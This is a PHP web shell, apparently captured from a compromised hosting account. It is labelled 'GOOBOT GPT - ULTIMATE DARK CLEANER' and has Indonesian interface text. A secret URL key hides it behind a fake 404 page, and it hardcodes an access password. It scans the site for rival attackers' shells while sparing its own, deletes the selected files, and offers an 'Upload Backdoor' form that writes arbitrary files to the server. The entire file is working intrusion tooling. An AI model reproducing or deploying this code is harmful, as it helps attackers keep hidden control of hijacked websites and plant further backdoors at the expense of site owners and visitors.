Peler

: / home2 / provisondrafting / public_html /
Filename : file.php
back
<?php
$real_password = "KasihKnow213";

if (!isset($_GET['p']) || $_GET['p'] !== "X9Yoo") {
    http_response_code(404);
    die("<html><body style='background:#000;'></body></html>");
}

echo '<style>
body { background:#000000; color:#ff0000; font-family:Consolas; padding:20px; }
input, textarea, button, select { background:#1a0000; color:#ff3333; border:1px solid #8b0000; }
button { padding:12px 20px; font-weight:bold; cursor:pointer; }
button:hover { background:#ff0000; color:#000; }
table { border-collapse:collapse; width:100%; }
th, td { border:1px solid #8b0000; padding:8px; text-align:left; }
th { background:#8b0000; }
</style>';

echo "<pre style='color:#ff0000; background:#0a0000; padding:15px;'>
╔══════════════════════════════════════════════════════════════╗
║           GOOBOT GPT - ULTIMATE DARK CLEANER v666            ║
║         Akses: clean.phl?p=X9Yoo   |   Pass: KasihKnow213    ║
╚══════════════════════════════════════════════════════════════╝
</pre>";

$target_dir = isset($_POST['target_dir']) && !empty($_POST['target_dir']) 
              ? $_POST['target_dir'] 
              : ($_SERVER['DOCUMENT_ROOT'] ?: getcwd());

$our_shells = isset($_POST['our_shells']) ? array_filter(explode("n", str_replace("r", "", $_POST['our_shells']))) : ["goobot.php", "g00b0t.php", "clean.phl"];

if (isset($_POST['delete_selected']) && isset($_POST['files_to_delete'])) {
    echo "<b>[+] Menghapus Shell yang dipilih...</b><br><br>";
    $deleted = 0;
    foreach ($_POST['files_to_delete'] as $file) {
        if (@unlink($file)) {
            echo "<span style='color:red;'>[ERASED] $file</span><br>";
            $deleted++;
        } else {
            echo "<span style='color:orange;'>[FAILED] $file (Permission Denied)</span><br>";
        }
    }
    echo "<br><b>$deleted Shell berhasil dihapus.</b><br><hr>";
}

echo '<form method="post">';
echo '<b>Target Directory:</b><br>';
echo '<input type="text" name="target_dir" value="'.htmlspecialchars($target_dir).'" size="100"><br><br>';

echo '<b>Nama Shell Kita (satu per baris):</b><br>';
echo '<textarea name="our_shells" rows="6" cols="90">'.htmlspecialchars(implode("n", $our_shells)).'</textarea><br><br>';

echo '<button type="submit" name="scan">SCAN SEMUA SHELL</button>';
echo '</form><hr>';

if (isset($_POST['scan'])) {
    echo "<b>[+] Scanning di: <span style='color:yellow;'>$target_dir</span></b><br><br>";

    $found_shells = [];

    function scan_shells($dir) {
        global $found_shells, $our_shells;
        $files = @scandir($dir);
        if (!$files) return;

        foreach ($files as $file) {
            if ($file == '.' || $file == '..') continue;
            $path = $dir . '/' . $file;

            if (is_dir($path)) {
                scan_shells($path);
            } elseif (preg_match('/.php$|.phtml$|.suspected$/i', $file)) {
                $content = strtolower(@file_get_contents($path));
                $is_our = false;

                foreach ($our_shells as $own) {
                    $own = trim(strtolower($own));
                    if (!empty($own) && (strpos(strtolower($file), $own) !== false || strpos($content, $own) !== false)) {
                        $is_our = true;
                        break;
                    }
                }

                if (!$is_our && (strpos($content, 'eval') !== false || strpos($content, 'base64_decode') !== false || 
                    strpos($content, 'shell_exec') !== false || strpos($content, 'system(') !== false || 
                    strpos($content, '<?php') === 0)) {
                    
                    $found_shells[] = $path;
                }
            }
        }
    }

    scan_shells($target_dir);

    if (empty($found_shells)) {
        echo "<b style='color:lime;'>Tidak ditemukan shell mencurigakan.</b><br>";
    } else {
        echo '<form method="post">';
        echo '<input type="hidden" name="target_dir" value="'.htmlspecialchars($target_dir).'">';
        echo '<input type="hidden" name="our_shells" value="'.htmlspecialchars(implode("n", $our_shells)).'">';

        echo '<table>';
        echo '<tr><th><input type="checkbox" onclick="toggleAll(this)"></th><th>Path Shell</th></tr>';

        foreach ($found_shells as $shell) {
            echo "<tr>
                    <td><input type='checkbox' name='files_to_delete[]' value='".htmlspecialchars($shell)."'></td>
                    <td>".htmlspecialchars($shell)."</td>
                  </tr>";
        }
        echo '</table><br>';
        echo '<button type="submit" name="delete_selected" style="background:#8b0000;">HAPUS YANG DICENTANG</button>';
        echo '</form>';
    }
}

echo '<hr><form method="post" enctype="multipart/form-data">';
echo '<b>Upload Backdoor Baru:</b><br>';
echo '<input type="file" name="upload_file"><br><br>';
echo '<button type="submit" name="upload">UPLOAD BACKDOOR</button>';
echo '</form>';

if (isset($_POST['upload']) && isset($_FILES['upload_file'])) {
    $target = basename($_FILES['upload_file']['name']);
    if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) {
        echo "<b style='color:lime;'>[+] Upload Berhasil → $target</b><br>";
    } else {
        echo "<b style='color:red;'>[-] Upload Gagal</b><br>";
    }
}

echo '<script>
function toggleAll(source) {
    checkboxes = document.getElementsByName("files_to_delete[]");
    for(var i=0; i<checkboxes.length; i++) {
        checkboxes[i].checked = source.checked;
    }
}
</script>';
?>